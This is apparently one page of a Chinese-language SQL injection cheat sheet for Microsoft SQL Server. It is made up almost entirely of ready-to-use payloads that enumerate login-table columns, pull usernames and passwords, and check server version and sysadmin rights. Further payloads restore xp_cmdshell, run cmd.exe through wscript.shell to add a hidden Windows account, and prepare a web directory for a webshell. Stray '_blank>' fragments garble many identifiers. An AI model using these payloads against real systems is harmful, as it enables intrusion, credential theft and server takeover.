这个查询语句可以猜解中文的用户和_blank>密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.

　　group by users.id having 1=1--

　　group by users.id, users.username,

　　users.password, users.privs having 1= 1--

　　; insert into users values( 666,

　　attacker, foobar, 0xffff )--

　　UNION SELECT TOP 1 COLUMN_blank>_NAME

　　FROM INFORMATION_blank>_SCHEMA.COLUMNS WHERE TABLE_blank>

　　_NAME=logintable-

　　UNION SELECT TOP 1 COLUMN_blank>_NAME FROM

　　INFORMATION_blank>_SCHEMA.COLUMNS WHERE TABLE_blank>_NAME=logintable WHERE

　　COLUMN_blank>_NAME NOT IN (login_blank>_id)-

　　UNION SELECT TOP 1

　　COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS WHERE

　　TABLE_blank>_NAME=logintable WHERE COLUMN_blank>_NAME NOT IN

　　(login_blank>_id,login_blank>_name)-

　　UNION SELECT TOP 1

　　login_blank> _name FROM logintable-

　　UNION SELECT TOP 1 password FROM

　　logintable where login_blank>_name=Rahul--

　　看_blank>服务器打的补丁=出错了打了SP4补丁

　　and 1=(select @@VERSION)--

　　看_blank>数据库连接账号的权限，返回正常，证明是_blank>服务器角色sysadmin权限。

　　and

　　1=(SELECT IS_blank>_SRVROLEMEMBER(sysadmin))--

　　判断连接_blank>数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA)

　　and sa=(SELECT

　　System_blank>_user)--

　　and user_blank>_name()=dbo--

　　and

　　0(select user_blank>_name()--

　　看xp_blank>_cmdshell是否删除

　　and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name =

　　xp_blank>_cmdshell)--

　　xp_blank>_cmdshell被删除，恢复,支持绝对路径的恢复

　　;EXEC

　　master.dbo.sp_blank>_addextendedproc xp_blank>_cmdshell,xplog70.dll--

　　;EXEC master.dbo.sp_blank>_addextendedproc xp_blank>_cmdshell,c:

　　\inetpub\wwwroot\xplog70.dll--

　　反向PING自己实验

　　;use master;declare @s

　　int;exec sp_blank>_oacreate "wscript.shell",@s out;exec sp_blank>_oamethod

　　@s,"run",NULL,"cmd.exe /c ping 192.168.0.1";--

　　加帐号

　　;DECLARE @shell

　　INT EXEC SP_blank>_OACREATE wscript.shell,@shell OUTPUT EXEC SP_blank>

　　_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$

　　1866574 /add--

　　创建一个虚拟目录E盘：

　　;declare @o int exec

　　sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o, run,

　　NULL, cscript.exe c：\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e： \"--

　　访问属性：(配合写入一个webshell)

　　declare @o int exec sp_blank>_oacreate

　　wscript.shell, @o out exec sp_blank>_oamethod @o, run, NULL, cscript.exe

　　c：\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse

上一页  [1] [2] [3] [4] 下一页